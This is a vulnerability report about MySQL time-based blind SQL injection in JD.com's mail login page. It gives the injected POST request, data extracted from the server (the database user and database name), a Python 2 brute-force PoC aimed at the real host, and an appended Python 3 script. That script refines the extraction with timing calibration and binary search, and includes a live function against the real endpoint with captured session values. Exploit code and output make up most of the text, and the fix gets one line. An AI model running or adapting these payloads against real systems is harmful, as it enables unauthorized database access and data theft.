MySQL injection in an important JD.com (京东商城) system (with verification script)
2016-02-15 11:10
Detailed description:

Injection point:

```http
POST https://mail.jd.com/Erpout/Logon.aspx

captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cbenchmark(10000000,md5(1))%2c0))OR'bbb&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5
```

The txtUser parameter is injectable (MySQL time-based blind injection). The value closes the string literal, XORs in an if() whose true branch runs benchmark(), and reopens the literal with OR'bbb so the query stays syntactically valid; 106 is the ASCII code of 'j', the first character of user(). With benchmark(15000000,md5(1)) in the true branch the response takes more than 2.0s, which is the timing signal the verification script keys on.
Proof of vulnerability:

Brute-forcing MySQL user() one character at a time yields:

```
[Done]MySQL user is jdmail_rw@172.17.27.41
```

```
database(): jdmail
```

![](http://static.wooyun.org/wooyun/upload/201512/26171819e3e783522c4206e7008ac5d4702f23a9.png)

Python verification script:
```python
#encoding=gbk
# Python 2 PoC: time-based blind extraction of user(), one character per position.
import httplib
import time

headers = {'Content-Type': 'application/x-www-form-urlencoded',
           'Cookie': 'ValiCode=PDC9BIL5P735'}   # captcha cookie captured during testing
# Candidate character set for user(); each position is tried against all of them.
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')

print 'start to retrive MySQL user:'
user = ''
for i in range(1, 23):                  # user() turned out to be 22 characters long
    for payload in payloads:
        conn = httplib.HTTPSConnection('mail.jd.com', timeout=30)
        # If the i-th character of user() equals the guess, the true branch of if()
        # runs benchmark(15000000,md5(1)) and the response is delayed by over 2s.
        s = "captcha=test&destination=https://mail.jd.com/owa/&" \
            "flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0" \
            "&trusted=4&txtPassword=test&" \
            "txtUser=aaaa'XOR(if(ascii(mid(user(),"+str(i)+",1))="+str(ord(payload))+"%2cbenchmark(15000000,md5(1))%2c0))OR'bbb" \
            "&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d" \
            "&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5"
        conn.request(method='POST', url="/Erpout/Logon.aspx", body=s, headers=headers)
        start_time = time.time()
        html_doc = conn.getresponse().read()
        conn.close()
        if time.time() - start_time > 2.0:  # slow response => the guess was right
            user += payload
            print '\n[In progress] %s' % user
            break
        else:
            print '.',
print '\n[Done]MySQL user is', user
```
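The PoC above tries up to 39 candidates per position against a fixed 2.0s cut-off, so one jittery response can mis-set a character and a position that matches nothing is silently skipped. The following Python 3 script is an added example, not part of the original report: it keeps the report's txtUser injection shape and benchmark() value, but calibrates the decision threshold from known-true and known-false probes, binary-searches ascii() with `>` predicates (7 requests per character instead of up to 39) and confirms each character with an `=` probe. It runs offline against `SimulatedTarget`, a constructed stand-in whose latencies and user() value are assumptions; `live_oracle()` shows where the report's real POST (cookie, __VIEWSTATE and __EVENTVALIDATION copied from the report) would plug in and is not called.

```python
#!/usr/bin/env python3
"""Calibrated, binary-search time-based blind extraction (added example)."""
import http.client
import random
import re
import time
from typing import Callable
from urllib.parse import quote

BENCHMARK_ROUNDS = 15000000  # value used by the report's PoC

Oracle = Callable[[str], float]  # txtUser value -> observed response time (s)


def build_injection(cond: str) -> str:
    """txtUser value in the report's shape, with an arbitrary boolean `cond`:
    a true condition makes the server burn time in benchmark()."""
    return "aaaa'XOR(if(%s,benchmark(%d,md5(1)),0))OR'bbb" % (cond, BENCHMARK_ROUNDS)


class SimulatedTarget:
    """Constructed stand-in for the server: evaluates the injected condition
    against a fixed user() and returns base latency + jitter, plus `slow`
    seconds when the condition is true (the benchmark() branch)."""

    _cond = re.compile(r"ascii\(mid\(user\(\),(\d+),1\)\)(>|=)(\d+)")

    def __init__(self, user="jdmail_rw@172.17.27.41", base=0.3, jitter=0.4, slow=2.5, seed=7):
        self.user, self.base, self.jitter, self.slow = user, base, jitter, slow
        self.rng = random.Random(seed)
        self.requests = 0

    def __call__(self, txt_user: str) -> float:
        self.requests += 1
        elapsed = self.base + self.rng.random() * self.jitter
        m = self._cond.search(txt_user)
        if m:
            pos, op, n = int(m.group(1)), m.group(2), int(m.group(3))
            # MySQL semantics: mid() past the end of the string yields '', ascii('') = 0
            c = ord(self.user[pos - 1]) if pos <= len(self.user) else 0
            truth = c > n if op == ">" else c == n
        else:
            truth = "1=1" in txt_user  # calibration probes use 1=1 / 1=2
        return elapsed + self.slow if truth else elapsed


def calibrate(oracle: Oracle, samples: int = 3) -> float:
    """Threshold halfway between the slowest known-false and the fastest
    known-true response, instead of the PoC's hard-coded 2.0s."""
    fast = [oracle(build_injection("1=2")) for _ in range(samples)]
    slow = [oracle(build_injection("1=1")) for _ in range(samples)]
    if max(fast) >= min(slow):
        raise RuntimeError("timing gap too small; raise BENCHMARK_ROUNDS")
    return (max(fast) + min(slow)) / 2


def char_at(oracle: Oracle, threshold: float, pos: int) -> int:
    """Binary-search ascii(mid(user(),pos,1)) over 0..127 with '>' probes
    (7 requests), then spend one '=' probe to confirm before trusting it."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(build_injection("ascii(mid(user(),%d,1))>%d" % (pos, mid))) > threshold:
            lo = mid + 1
        else:
            hi = mid
    if oracle(build_injection("ascii(mid(user(),%d,1))=%d" % (pos, lo))) <= threshold:
        raise RuntimeError("position %d failed confirmation; recalibrate and retry" % pos)
    return lo


def extract_user(oracle: Oracle, max_len: int = 64) -> str:
    """Recover user() character by character; ascii 0 marks the end of the string."""
    threshold = calibrate(oracle)
    out = ""
    for pos in range(1, max_len + 1):
        c = char_at(oracle, threshold, pos)
        if c == 0:
            break
        out += chr(c)
    return out


def live_oracle(txt_user: str) -> float:
    """Assumed live oracle (not exercised here): the report's POST with the
    injected txtUser, timed end to end. Cookie and ASP.NET hidden fields are
    the report's captured values and would need refreshing."""
    body = ("captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0"
            "&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test"
            "&txtUser=" + quote(txt_user, safe="") +
            "&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d"
            "&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5")
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "Cookie": "ValiCode=PDC9BIL5P735"}
    conn = http.client.HTTPSConnection("mail.jd.com", timeout=30)
    start = time.time()
    conn.request("POST", "/Erpout/Logon.aspx", body=body, headers=headers)
    conn.getresponse().read()
    conn.close()
    return time.time() - start


if __name__ == "__main__":
    sim = SimulatedTarget()
    print("user() =", extract_user(sim), "in", sim.requests, "requests")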
Fix:

Escape and filter the parameter; better still, pass txtUser to the query as a bound parameter instead of concatenating it into the SQL string.